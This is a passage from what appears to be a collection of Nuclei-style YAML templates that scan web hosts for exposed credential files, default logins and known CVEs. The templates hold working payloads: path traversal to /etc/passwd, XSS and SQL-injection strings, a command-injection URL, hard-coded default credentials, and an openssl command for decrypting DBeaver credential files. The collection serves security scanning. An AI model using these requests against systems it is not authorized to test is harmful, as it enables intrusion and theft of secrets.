11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.ssh/known_hosts" 14 | - "{{BaseURL}}/.ssh/known_hosts.old" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "ssh-dss" 21 | - "ssh-ed25519" 22 | - "ssh-rsa" 23 | - "ecdsa-sha2-nistp256" 24 | condition: or 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /eyelock-nano-lfd.yaml: -------------------------------------------------------------------------------- 1 | id: eyelock-nano-lfd 2 | 3 | info: 4 | name: EyeLock nano NXT 3.5 - Local File Disclosure 5 
| description: 6 | author: geeknik 7 | reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt 8 | severity: high 9 | tags: eyelock,lfd,traversal,iot,biometrics 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0:" 24 | part: body 25 | -------------------------------------------------------------------------------- /pagespeed-global-admin.yaml: -------------------------------------------------------------------------------- 1 | id: pagespeed-global-admin 2 | 3 | info: 4 | name: Pagespeed Global Admin 5 | author: geeknik 6 | severity: low 7 | tags: pagespeed,admin 8 | 9 | requests: 10 | - method: GET 11 | headers: 12 | X-Client-IP: "127.0.0.1" 13 | X-Remote-IP: "127.0.0.1" 14 | X-Remote-Addr: "127.0.0.1" 15 | X-Forwarded-For: "127.0.0.1" 16 | X-Originating-IP: "127.0.0.1" 17 | X-Host: "127.0.0.1" 18 | X-Forwarded-Host: "127.0.0.1" 19 | 20 | path: 21 | - "{{BaseURL}}/pagespeed-global-admin/" 22 | 23 | matchers: 24 | - type: word 25 | words: 26 | - "X-Mod-Pagespeed" 27 | part: header 28 | -------------------------------------------------------------------------------- /salesforce-login.yaml: -------------------------------------------------------------------------------- 1 | id: salesforce-login 2 | 3 | info: 4 | name: Salesforce Credentials 5 | author: geeknik 6 | severity: high 7 | tags: salesforce,auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/js/salesforce.js" 13 | - "{{BaseURL}}/salesforce.js" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "jsforce.Connection" 27 | - "conn.login" 28 | - "conn.query" 29 | condition: and 30 | 
-------------------------------------------------------------------------------- /swagger-xss.yaml: -------------------------------------------------------------------------------- 1 | id: swagger-xss 2 | 3 | info: 4 | name: Swagger API XSS 5 | author: geeknik 6 | severity: medium 7 | reference: https://twitter.com/A0x017/status/1371122293921964032 8 | tags: swagger,xss 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/dochelper?userId=<script>alert({{randstr}})</script>" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/html" 21 | - type: word 22 | part: body 23 | words: 24 | - "<script>alert({{randstr}})</script>" 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /ventrilo-config.yaml: -------------------------------------------------------------------------------- 1 | id: ventrilo-config 2 | 3 | info: 4 | name: Ventrilo Configuration File 5 | author: geeknik 6 | reference: https://www.ventrilo.com/setup.php 7 | severity: high 8 | tags: ventrilo,config,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ventrilo_srv.ini" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: word 22 | words: 23 | - "[Server]" 24 | - "Name" 25 | - "Phonetic" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /CVE-2018-3167.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-3167 2 | 3 | info: 4 | name: Unauthenticated Blind SSRF in Oracle EBS 5 | author: geeknik 6 | severity: low 7 | description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 8 | tags: cve,cve2018,oracle,ebs,ssrf 9 | 10 | requests: 11 | - method: POST 12 | path: 13 | - 
'{{BaseURL}}/OA_HTML/lcmServiceController.jsp' 14 | 15 | body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80"> 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - 'Unexpected text in DTD' 22 | part: body 23 | - type: status 24 | status: 25 | - 200 -------------------------------------------------------------------------------- /ssh-authorized-keys.yaml: -------------------------------------------------------------------------------- 1 | id: ssh-authorized-keys 2 | 3 | info: 4 | name: SSH Authorized Keys 5 | author: geeknik 6 | reference: https://www.ssh.com/academy/ssh/authorized-key 7 | severity: low 8 | tags: config,exposure,ssh 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.ssh/authorized_keys" 14 | - "{{BaseURL}}/_/.ssh/authorized_keys" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "ssh-dss" 21 | - "ssh-ed25519" 22 | - "ssh-rsa" 23 | - "ecdsa-sha2-nistp256" 24 | condition: or 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /circarlife-default-login.yaml: -------------------------------------------------------------------------------- 1 | id: circarlife-default-login 2 | 3 | info: 4 | name: CirCarLife SCADA Default Login 5 | reference: https://www.exploit-db.com/exploits/45384 6 | author: geeknik 7 | severity: critical 8 | tags: circarlife,scada,iot,auth 9 | 10 | requests: 11 | - method: POST 12 | path: 13 | - "{{BaseURL}}/html/setup.html" 14 | headers: 15 | Authorization: "Basic YWRtaW46MTIzNAo=" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: word 23 | words: 24 | - "<title>OCPP Engine - Setup" 25 | - "Application Parameters" 26 | condition: and 27 | -------------------------------------------------------------------------------- /ganglia-xml-grid-monitor.yaml: 
-------------------------------------------------------------------------------- 1 | id: ganglia-xml-grid-monitor 2 | 3 | info: 4 | name: Ganglia XML Grid Monitor 5 | author: geeknik 6 | description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. 7 | reference: http://ganglia.info/ 8 | severity: low 9 | tags: ganglia,network 10 | 11 | network: 12 | - inputs: 13 | - data: "\r\n" 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Hostname}}:8649" 18 | read-size: 2048 19 | 20 | matchers: 21 | - type: word 22 | words: 23 | - "SCADmonitor" 24 | - "SCADAmonitor" 25 | condition: or 26 | - type: word 27 | words: 28 | - "SCADAmonitor y su logo son propiedad de tectuus®" 29 | -------------------------------------------------------------------------------- /esmtprc.yaml: -------------------------------------------------------------------------------- 1 | id: esmtprc 2 | 3 | info: 4 | name: esmtprc dotfile 5 | author: geeknik 6 | description: esmtp configuration file 7 | reference: https://linux.die.net/man/5/esmtprc 8 | severity: high 9 | tags: esmtp,config 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/.esmtprc" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "text/plain" 22 | - type: word 23 | part: body 24 | words: 25 | - "hostname" 26 | - "username" 27 | - "password" 28 | condition: and 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /lutron-iot-default-login.yaml: -------------------------------------------------------------------------------- 1 | id: lutron-iot-default-login 2 | 3 | info: 4 | name: Lutron IOT Device Default Login 5 | reference: https://www.lutron.com 6 | author: geeknik 7 | severity: high 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login?login=lutron&password=lutron" 13 | 14 | matchers-condition: and 15 
| matchers: 16 | - type: word 17 | words: 18 | - "LUTRON" 19 | - ">DeviceIP" 20 | - ">Get Database Info as XML" 21 | condition: and 22 | - type: word 23 | part: header 24 | words: 25 | - "text/html" 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /ftpconfig.yaml: -------------------------------------------------------------------------------- 1 | id: ftpconfig 2 | 3 | info: 4 | name: Atom remote-ssh ftpconfig 5 | author: geeknik 6 | description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials 7 | severity: high 8 | tags: atom,ftp,config 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.ftpconfig" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "protocol" 27 | - "host" 28 | - "port" 29 | - "user" 30 | condition: and 31 | -------------------------------------------------------------------------------- /sftp-config.yaml: -------------------------------------------------------------------------------- 1 | id: sftp-config 2 | 3 | info: 4 | name: sftp password exposure 5 | author: geeknik 6 | reference: https://blog.sucuri.net/2012/11/psa-sftpftp-password-exposure-via-sftp-config-json.html 7 | severity: high 8 | tags: sftp,config,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/sftp-config.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "application/json" 21 | - type: word 22 | words: 23 | - "host\":" 24 | - "user\":" 25 | - "sftp" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /CVE-2021-33904.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-33904 2 | 
3 | info: 4 | name: Accela Civic Platform 21.1 - 'servProvCode' XSS 5 | author: geeknik 6 | description: 7 | reference: https://www.exploit-db.com/exploits/49980 8 | severity: medium 9 | tags: cve,cve2021,accela,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}//security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm({{randstr}})%5e%22a2pbrnzx5a9" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "text/html" 21 | - type: word 22 | part: header 23 | words: 24 | - 'k3woq"^confirm({{randstr}})^"a2pbrnzx5a9' 25 | condition: and 26 | -------------------------------------------------------------------------------- /CVE-2018-2894.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-2894 2 | 3 | info: 4 | name: Oracle WebLogic RCE 5 | author: geeknik 6 | description: An easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. 
7 | reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ 8 | severity: critical 9 | tags: cve,cve2018,oracle,weblogic,rce 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/ws_utc/config.do" 15 | 16 | redirects: true 17 | matchers: 18 | - type: word 19 | words: 20 | - "* Copyright (c) 2005,2013, Oracle" 21 | - "settings" 22 | condition: and -------------------------------------------------------------------------------- /gmail-api-client-secrets.yaml: -------------------------------------------------------------------------------- 1 | id: gmail-api-client-secrets 2 | 3 | info: 4 | name: GMail API client_secrets.json 5 | author: geeknik 6 | severity: info 7 | description: https://developers.google.com/gmail/api/auth/web-server 8 | tags: config,exposure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/client_secrets.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "client_id" 20 | - "auth_uri" 21 | - "token_uri" 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | - type: word 27 | part: header 28 | words: 29 | - "application/json" 30 | -------------------------------------------------------------------------------- /selea-ip-camera.yaml: -------------------------------------------------------------------------------- 1 | id: selea-ip-camera 2 | info: 3 | name: Detect Selea Targa IP OCR-ANPR Camera 4 | author: geeknik 5 | description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php 6 | severity: info 7 | tags: iot 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: header 18 | words: 19 | - "SeleaCPSHttpServer" 20 | - type: word 21 | part: body 22 | words: 23 | - "Selea CarPlateServer" 24 | - type: status 25 | status: 26 | - 
200 27 | -------------------------------------------------------------------------------- /CVE-2014-2323.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2014-2323 2 | 3 | info: 4 | name: lighttpd 1.4.34 SQL injection and path traversal 5 | description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname. 6 | reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt 7 | author: geeknik 8 | severity: info 9 | tags: cve,cve2014,sqli,lighttpd 10 | 11 | requests: 12 | - raw: 13 | - | 14 | GET /etc/passwd HTTP/1.1 15 | Host: [::1]' UNION SELECT '/ 16 | 17 | unsafe: true 18 | redirects: true 19 | matchers: 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0:" 23 | -------------------------------------------------------------------------------- /pyramid-debug-toolbar.yaml: -------------------------------------------------------------------------------- 1 | id: pyramid-debug-toolbar 2 | info: 3 | name: Pyramid Debug Toolbar 4 | author: geeknik 5 | description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application. 
6 | reference: https://github.com/Pylons/pyramid_debugtoolbar 7 | severity: medium 8 | tags: pyramid,logs,exposure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/_debug_toolbar/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Pyramid Debug Toolbar" 20 | - "Pyramid DebugToolbar" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /redmine-db-config.yaml: -------------------------------------------------------------------------------- 1 | id: redmine-db-config 2 | info: 3 | name: Detect Redmine Database Configuration 4 | author: geeknik 5 | description: Redmine is a flexible project management web application written using Ruby on Rails framework - https://redmine.org/projects/redmine 6 | severity: medium 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/config/database.yml" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'adapter:' 20 | - 'database:' 21 | - 'host:' 22 | - 'production:' 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 -------------------------------------------------------------------------------- /CVE-2017-16806.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-16806 2 | 3 | info: 4 | name: Ulterius Server < 1.9.5.0 - Directory Traversal 5 | author: geeknik 6 | reference: https://www.exploit-db.com/exploits/43141 7 | severity: high 8 | tags: cve,cve2017,ulterius,traversal 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" 14 | - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0:" 24 | - 
"\\[(font|extension|file)s\\]" 25 | condition: or 26 | part: body 27 | -------------------------------------------------------------------------------- /avtech-dvr-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: avtech-dvr-exposure 2 | 3 | info: 4 | name: Avtech AVC798HA DVR Information Exposure 5 | description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. 6 | reference: http://www.avtech.com.tw/ 7 | author: geeknik 8 | severity: low 9 | tags: dvr,exposure,avtech 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi-bin/nobody/Machine.cgi?action=get_capability" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "Firmware.Version=" 24 | - "MACAddress=" 25 | - "Product.Type=" 26 | condition: and 27 | -------------------------------------------------------------------------------- /jetty-information-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: jetty-information-disclosure 2 | 3 | info: 4 | name: Jetty 9.4.37 & 9.4.38 Information Disclosure 5 | author: geeknik 6 | reference: http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.117479 7 | severity: low 8 | tags: jetty 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "application/xml" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "" 27 | - "java.sun.com" 28 | condition: and 29 | -------------------------------------------------------------------------------- /zwave2mqtt-health-check.yaml: -------------------------------------------------------------------------------- 1 | id: zwave2mqtt-health-check 2 | 3 | info: 4 | name: Zwave2MQTT Health Check 5 | 
reference: 6 | - https://github.com/OpenZWave/Zwave2Mqtt#health-check-endpoints 7 | author: geeknik 8 | severity: info 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/health/mqtt" 14 | - "{{BaseURL}}/health/zwave" 15 | headers: 16 | Accept: "text/plain" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - 500 24 | condition: or 25 | - type: word 26 | part: header 27 | words: 28 | - "text/plain" 29 | - type: dsl 30 | dsl: 31 | - "len(body) < 1" 32 | -------------------------------------------------------------------------------- /CVE-2018-11784.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-11784 2 | 3 | info: 4 | name: Apache Tomcat Open Redirect 5 | author: geeknik 6 | description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because they fail to properly sanitize user-supplied input. 7 | reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E 8 | severity: medium 9 | tags: tomcat,redirect,cve,cve2018 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}//example.com" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" 20 | part: header 21 | -------------------------------------------------------------------------------- /CVE-2021-26475.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-26475 2 | 3 | info: 4 | name: EPrints 3.4.2 XSS 5 | author: geeknik 6 | description: EPrints 3.4.2 exposes a reflected XSS opportunity via a cgi/cal URI. 
7 | reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf 8 | severity: medium 9 | tags: cve,cve2021,xss,eprints 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "" 21 | - type: word 22 | part: header 23 | words: 24 | - "text/html" 25 | -------------------------------------------------------------------------------- /config-file.yaml: -------------------------------------------------------------------------------- 1 | id: config-file 2 | 3 | info: 4 | name: Detect Config File 5 | author: geeknik 6 | severity: high 7 | tags: config,auth,api 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/config/default.json" 13 | - "{{BaseURL}}/config.json" 14 | - "{{BaseURL}}/config/config.json" 15 | - "{{BaseURL}}/credentials/config.json" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - '"api_keys":' 22 | - '"accessKey":' 23 | - '"secretKey":' 24 | condition: or 25 | - type: status 26 | status: 27 | - 200 28 | - type: word 29 | words: 30 | - "application/json" 31 | part: header 32 | -------------------------------------------------------------------------------- /django-secret.key.yaml: -------------------------------------------------------------------------------- 1 | id: django-secret-key 2 | 3 | info: 4 | name: Django Secret Key 5 | author: geeknik 6 | severity: high 7 | tags: django 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/settings.py" 13 | - "{{BaseURL}}/app/settings.py" 14 | - "{{BaseURL}}/django/settings.py" 15 | - "{{BaseURL}}/settings/settings.py" 16 | - "{{BaseURL}}/web/settings/settings.py" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | part: body 25 | words: 26 | - "SECRET_KEY =" 27 | - type: word 28 | part: 
header 29 | words: 30 | - "text/html" 31 | negative: true 32 | -------------------------------------------------------------------------------- /php-timeclock-xss.yaml: -------------------------------------------------------------------------------- 1 | id: php-timeclock-xss 2 | 3 | info: 4 | name: PHP Timeclock 1.04 XSS 5 | author: geeknik 6 | description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities 7 | reference: https://www.exploit-db.com/exploits/49853 8 | severity: medium 9 | tags: timeclock,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=confirm%60xss%60%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "text/html" 22 | - type: word 23 | words: 24 | - "'>" 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /robomongo.yaml: -------------------------------------------------------------------------------- 1 | id: robomongo 2 | 3 | info: 4 | name: Detect robomongo.json 5 | author: geeknik 6 | description: MongoDB credentials file used by RoboMongo 7 | severity: high 8 | tags: mongodb,robomongo,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/db/robomongo.json" 14 | - "{{BaseURL}}/robomongo.json" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "application/json" 22 | - type: word 23 | words: 24 | - "databaseName" 25 | - "userName" 26 | - "userPassword" 27 | - "serverHost" 28 | condition: and 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2018-16670.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16670 2 | 3 | info: 4 | name: CirCarLife SCADA PLC Status 5 | description: PLC status disclosure due to lack 
of authentication 6 | reference: 7 | - https://www.exploit-db.com/exploits/45384 8 | author: geeknik 9 | severity: medium 10 | tags: cve,cve2018,circarlife,scada,plc,iot,disclosure 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/services/user/values.xml?var=STATUS" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "CirCarLife Scada" 23 | - type: word 24 | part: body 25 | words: 26 | - "" 27 | - "Reader.STATUS" 28 | condition: and 29 | -------------------------------------------------------------------------------- /CVE-2009-0545.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-0545 2 | 3 | info: 4 | name: ZeroShell <= 1.0beta11 Remote Code Execution 5 | author: geeknik 6 | description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. 
7 | reference: https://www.exploit-db.com/exploits/8023 8 | severity: critical 9 | tags: cve,cve2009,zeroshell,kerbynet,rce 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" 15 | 16 | matchers: 17 | - type: regex 18 | part: body 19 | regex: 20 | - "root:[x*]:0:0:" 21 | -------------------------------------------------------------------------------- /CVE-2018-12634.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-12634 2 | 3 | info: 4 | name: Exposed CirCarLife System Log 5 | author: geeknik 6 | description: CirCarLife is an internet-connected electric vehicle charging station 7 | reference: https://circontrol.com/ 8 | severity: medium 9 | tags: cve,cve2018,scada,circontrol,circarlife,logs 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/html/log" 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "CirCarLife Scada" 21 | - type: word 22 | words: 23 | - "user.debug" 24 | - "user.info" 25 | - "EVSE" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /CVE-2021-31581.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31581 2 | 3 | info: 4 | name: Akkadian Provisioning Manager MariaDB Credentials 5 | author: geeknik 6 | reference: 7 | - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ 8 | - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ 9 | severity: medium 10 | tags: cve,cve2021,akkadian,mariadb,auth 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/pme/database/pme/phinx.yml" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 
21 | - 200 22 | - type: word 23 | words: 24 | - "host:" 25 | - "name:" 26 | - "pass:" 27 | condition: and 28 | -------------------------------------------------------------------------------- /dbeaver-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: dbeaver-credentials 2 | 3 | info: 4 | name: DBeaver Credential Exposure 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.dbeaver/credentials-config.json" 12 | # to decode the above file, run this: 13 | # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "application/octet-stream" 23 | part: header 24 | - type: dsl 25 | dsl: 26 | - "len(body) >=200 && len(body) <400" 27 | -------------------------------------------------------------------------------- /remote-sync.yaml: -------------------------------------------------------------------------------- 1 | id: remote-sync 2 | 3 | info: 4 | name: Remote Sync for Atom credentials 5 | author: geeknik 6 | description: Created by remote-sync for Atom, contains FTP and/or SCP/SFTP/SSH server details and credentials 7 | severity: high 8 | tags: atom,sftp,scp,ssh,ftp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.remote-sync.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | part: header 22 | words: 23 | - "application/json" 24 | - type: word 25 | words: 26 | - "Remote Sync" 27 | - "hostname" 28 | - "username" 29 | - "password" 30 | condition: and 31 | -------------------------------------------------------------------------------- /CVE-2018-16668.yaml: -------------------------------------------------------------------------------- 1 | id: 
CVE-2018-16668 2 | 3 | info: 4 | name: CirCarLife SCADA Installation Paths 5 | description: System software installation path disclosure due to lack of authentication 6 | reference: 7 | - https://www.exploit-db.com/exploits/45384 8 | author: geeknik 9 | severity: medium 10 | tags: cve,cve2018,circarlife,scada,iot,disclosure 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/html/repository" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "CirCarLife Scada" 23 | - type: word 24 | part: body 25 | words: 26 | - "** Platform sources **" 27 | - "** Application sources **" 28 | condition: and 29 | -------------------------------------------------------------------------------- /CVE-2020-22840.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-22840 2 | 3 | info: 4 | name: b2evolution CMS Open redirect 5 | author: geeknik 6 | severity: low 7 | description: An open redirect vulnerability in b2evolution CMS versions prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker-controlled resource via the redirect_to parameter in email_passthrough.php. 8 | tags: cve,cve2020,redirect,b2evolution 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" 14 | 15 | matchers: 16 | - type: regex 17 | regex: 18 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' 19 | part: header 20 | -------------------------------------------------------------------------------- /CVE-2020-29164.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-29164 2 | 3 | info: 4 | name: PacsOne Server XSS 5 | description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS). 
6 | author: geeknik 7 | severity: medium 8 | tags: pacsone,xss,cve,cve2020 9 | reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - "text/html" 22 | part: header 23 | 24 | - type: word 25 | words: 26 | - '1' 27 | part: body 28 | -------------------------------------------------------------------------------- /chamilo-lms-xss.yaml: -------------------------------------------------------------------------------- 1 | id: chamilo-lms-xss 2 | 3 | info: 4 | name: Chamilo LMS Cross Site Scripting 5 | author: geeknik 6 | severity: medium 7 | description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ 8 | tags: xss,chamilo 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - 'agenda_js.php?type=xss" 